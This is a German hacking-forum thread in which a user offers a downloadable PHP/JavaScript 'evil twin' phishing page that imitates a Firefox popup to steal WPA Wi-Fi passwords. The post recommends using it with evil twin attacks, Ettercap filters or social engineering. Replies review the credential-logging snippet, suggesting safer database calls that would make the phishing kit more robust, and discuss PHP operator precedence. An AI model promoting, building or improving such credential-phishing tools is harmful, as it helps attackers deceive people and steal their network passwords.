Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[EVIL TWIN] WLAN WPA Phising-Site (Firefox)

- - - - -

  • Bitte melde dich an um zu Antworten
3 Antworten in diesem Thema

#1
m0nk3y

m0nk3y

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    25
  • 29 Beiträge
  • 43 Bedankt

Hey Freunde,

 

ich hab vorhin ein kleines Projekt von mir gefunden und würde es gerne mit euch teilen.

Möglicherweise kann es irgendwann einmal nützlich werden. :)

 

Es ist eine kleine Phising Seite für WPA Passwörter; designtechnisch für Firefox && Windows ausgelegt.

 

Popup ist realtiv dynamisch gestaltet; kann verschoben und geschlossen werden (poppt aber wieder auf)

Deswegen fühlt es sich auch ziemlich echt an.

 

Requirements: Javascript  && PHP (&& MySQL) Server

 

Mögliche Einsatzgebiete wären:

- Evil Twin Attacken

- Ettercap Filter

 

Oder man könnte vielleicht sogar mit genug Social Engineering Skills jemanden übers Web dazu bringen, sein WLAN-Passwort zu offenbaren.

 

Vergisst nicht die ESSID entsprechend anzupassen ;)

 

Das ganze ist aus Komfort für MySQL ausgelegt, kann aber leicht auf File I/O umgeschrieben werden.

 

wpas5u0b.jpg

wpa2chux5.jpg

 

 

DOWNLOAD

Versteckter Inhalt
Klicke auf den Danke-Button um den versteckten Inhalt sehen zu können. Nur registrierte Mitglieder haben Zugriff hierauf.


  • gtawelt, Framerater, hacked und 4 anderen gefällt das

Thanked by 12 Members:
parisdefr , jmPesp , Erikson , psy86 , TheMothafuckaa , 3xc3ll3nt , h04x , mrundercover , hacked , lNobodyl , 1x1 , Agent

#2
lNobodyl

lNobodyl

    Hacktivist

  • Premium Member
  • Likes
    55
  • 67 Beiträge
  • 22 Bedankt
  • iPhone
  • Windows, Mac OS

Habe noch ein paar Verbesserungsvorschläge

1. Benutze mysqli() statt mysql(). Das hat den Grund das mysql() veraltet ist und man stattdessen die Erweiterungen MySqli() oder PDO_MYSQL benutzen sollte.

2.

if ($_POST['aa2']!="" AND $_POST['aa3']!="") 

PHP stellt für diesen Fall die Funktion empty() zur Verfügung.

if(!empty($_POST['aa2']) && !empty($_POST['aa3'])){ 
// "&&" ist in der Praxis schneller als "AND"

3. Auf dem ersten Blick scheint die Page SQL-Injection gefährdet zu sein.

$pass = $_POST['aa2'];
[..]
mysql_query("INSERT INTO wpa_logs (wlan_spot, pass) values ('$wlan', '$pass')") or die("Allgemeiner Fehler");

Die Variable $pass wird einfach ungefiltert in den SQL Query eingefügt --> sieht für mich nach einer SQLi aus.

Abhilfe schafft hier das Filtern von dem Input oder prepared statements.


  • m0nk3y und old_panther gefällt das
Kind regards,

Nobody

nobody@xmpp.ninja


Thanked by 2 Members:
parisdefr , m0nk3y

#3
m0nk3y

m0nk3y

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    25
  • 29 Beiträge
  • 43 Bedankt

Krieg ja fast schon das Verlangen mein Projekt auf GitHub zu uppen! :>

Danke lNobodyl für die Verbesserung.

 

 

Hier noch meine formale Ausrede:

Der Code ist schon etwas älter und war nur eine schnelle lokale Spontanlösung :P


  • lNobodyl gefällt das

Thanked by 1 Member:
lNobodyl

#4
B1nary

B1nary

    Samurai

  • Elite Member
  • Likes
    489
  • 506 Beiträge
  • 346 Bedankt
// "&&" ist in der Praxis schneller als "AND"

 

Das hätte ich gerne mal belegt ;)

 

&& und AND oder auch || und OR unterscheiden sich in ihrer Rangfolge, darum gibt es auch beide Schreibweisen!

# 1. Fall
$check = true && false;
echo ($check ? 'true' : 'false'); // false

# 2. Fall
$check = true and false;
echo ($check ? 'true' : 'false'); // true

Beim Fall 1 wird der Variablen das logische Ergebnis aus true && false zugewiesen, was false ist.

Der Fall 2 hingegen ergibt true, weil der boolsche Wert nach dem and ignoriert wird.

 

Wieso? Weil || bzw. && eine höhere Rangfolge gegenüber dem = haben als or bzw. and (or/and haben dementsprechend eine niedrigere Rangfolge als das = )

 

Anders ausgedrückt:

# 1. Fall (das && wird zuerst ausgefuehrt, da es "höher" als das = ist)
$check = true && false;
$check = (true && false);

# 2. Fall (hier wird das = zuerst ausgefuehrt, da es "höher" als das and ist)
$check = true and false;
($check = true) and false;




  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 131 user(s)


    , , .:dodo:., .Puma, 0*ptr, 13fuckthepolice12, 1x1, 3eyes, 3xc3ll3nt, Agent, alio202, and6578, Ar@m!s, Arthurarsch, B1nary, Becks, blizzard1904, Blume, Born2Hack, c3fC, Caruso, Ch!ller, creamfresh, Cyber Tjak, CyberFlash, daredevil_hellfire207, dealerscup, desmond, dischien, donzen, dvalar, easysurfer, elmicky, Emergencybuddy, Erikson, eXact, FakeKeyUser, Flex.Net, fluffybunny, Framerater, frechdax, FrogPussyGreen, FullMetall, funstyler, G0stF4CE, Goethe, gtawelt, h04x, hacked, hackeris, hanke, Haxlor, holz96, Huseijnx3, Hydra, isi, italyrex, iUniqu3, Janjij, jmPesp, JohnDS, Kaase, Karma, kevte89, keyb0ardz, kingkev0, Klaus, Klopfer, Kozuki, L!x, Larva, len0, leonalexkraus, lNobodyl, loginman1, lolorollo, m0nk3y, m0rph75, makuta, mantwohouse, MDDD, mettbrot, Mr_NiceGuy, MrQntm, mrundercover, n0de, n1nja, nibble nibble, notfound, o0o, old_panther, p0pc0rn, paulaner, peppi200, pi^2, pornoralle, psy86, Psypanda, R@zz@R-LightS, R0b3rt, R3s1stanc3, rat123, ref0rm, SAR, SavE1, Siggisuper, Silent, Silent0wn3r, SirDuke, sirlex, smc2014, Statine, T00LStar, Take1T, Terrafaux, TheBuddler, TheMothafuckaa, umarex, undercov, VeqasZ, vital, vôl, warkammer, wbx32, weedneger77, westendboy, whitehawk, wipebot, x1z0ng, x770s, Xenio
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.